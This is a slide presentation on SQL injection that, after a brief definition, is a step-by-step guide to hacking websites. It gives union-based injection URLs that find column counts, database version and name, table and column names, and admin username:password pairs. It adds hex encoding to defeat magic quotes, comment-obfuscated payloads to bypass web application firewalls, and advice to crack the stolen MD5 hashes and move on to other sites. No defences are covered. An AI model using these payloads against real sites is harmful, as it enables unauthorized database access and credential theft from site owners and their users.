SQL Injection
25 likes14,586 views
SQL injection is a code injection technique that exploits vulnerabilities in database-driven web applications. It occurs when user input is not validated or sanitized for string literal escape characters that are part of SQL statements. This allows attackers to interfere with the queries and obtain unauthorized access to sensitive data or make changes to the database. The document then provides step-by-step instructions on how to scan for vulnerabilities, determine database details like name and tables, extract data like user credentials, bypass protections like magic quotes, and use tools to automate the process.
SQL Injection
- 1. SQL Injection Kaushal Kishore Sr. Software Engineer OSSCube Pvt. Ltd. [email protected] www.osscube.com
- 2. What is SQL Injection SQL injection is a technique that is applied by giving malicious inputs, that result in allowing the hacker to access over the database of the Host, in case if the database operations of that web sites is allowed directly...! "SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks".
- 3. How to Hack the website Using SQL Injection
- 5. Check Site is vulnerable or Not? Add the '(Single Quote) sign with the integer value in URL http://www.examplesite.com/index.php?id=5' If the site shows you an error it is vulnerable to SQL, lets say we found a vulnerable site.
- 6. Find Number of Columns http://www.examplesite.com/index.php?id=5 order by 1-- And we will keep increasing the number until we get an error. http://www.examplesite.com/index.php?id=5 order by 5-- http://www.examplesite.com/index.php?id=5 order by 10-- Lets say there is 10 columns in the database.
- 7. Find vulnerable columns. http://www.examplesite.com/index.php?id=-5 union select 1,2,3,4,5,6,7,8,9,10-- Notice that I have put a single - in front of the id number (id=-5) Since there is no page with the id -5 it simply put just clears the sites text for us. That makes it easier for us to find the data that we are looking for. Okay lets say the numbers 3, 6 and 9 popped up on the site, as vulnerable columns.
- 8. Find Database Version http://www.examplesite.com/index.php?id=-5 union select 1,2,@@version,4,5,6,7,8,9,10-- And if that doesn't work then try this 1: http://www.examplesite.com/index.php?id=-5 union select 1,2,version(),4,5,6,7,8,9,10--
- 9. Find Database Name http://www.examplesite.com/index.php?id=-5 union select 1,2, concat(database()) ,4,5,6,7,8,9,10-- Write that name down so you wont forget it. Lets say the database name i just extracted was named exampledatabase If the version is 4 or below, it is probably best that you just move on to another site since you are gonna have to brute force the tables for information (which isn't a very good idea for starters like us )
- 10. Find the Tables Name http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()-- http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()-- http://www.examplesite.com/index.php?id=-5 union select 1,2,table_name ,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
- 11. Find the Columns Name http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name="admin"-- If the site shows you an error now don't panic! All that means is that Magic Quotes is turned on. To bypass this we need to convert the text "admin" into hex.
- 12. Change the Name of Table to Hex Copy the name of the table you are trying to access, visit the site Text to Hex, paste the name into the website where it says "Say Hello To My Little Friend". Click Convert copy the hex into your query like this. http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x61646d696e-- Notice the 0x before the hex string. This is to tell the server that the next part is a hex string. You should now see all the columns inside the table.
- 13. Find the Content of the Tables Lets say there are 2 columns called username and password. In order to see what are inside of those columns we will use this query: http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10 from exampledatabase.admin-- This is where we needed the database name. Btw the 0x3a means colon ( : ) Now you have the admin login! If it is decrypted, try to run it through some online md5 'decrypters' or use my free cracked And now we have to find the admin login, to do so, once again you can
- 14. By Pass The WAF http://www.example.com/staffdetail.php?id=123'+/*! union*/select+1,2,3,4,5,6,7--+ http://www.example.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3-- http://www.example.com/staffdetail.php?id=123'+/*!union*//*!select*/ +all+1,2,table_name,4,5,6,7+FROM+information_schema.tables+W HERE+table_schema+=+database()+LIMIT+0,10--+
- 15. Tools for SQL Injection SQL Ninja SQL Map Havij
- 16. Questions
- 17. Thank you for your Time and Attention! 17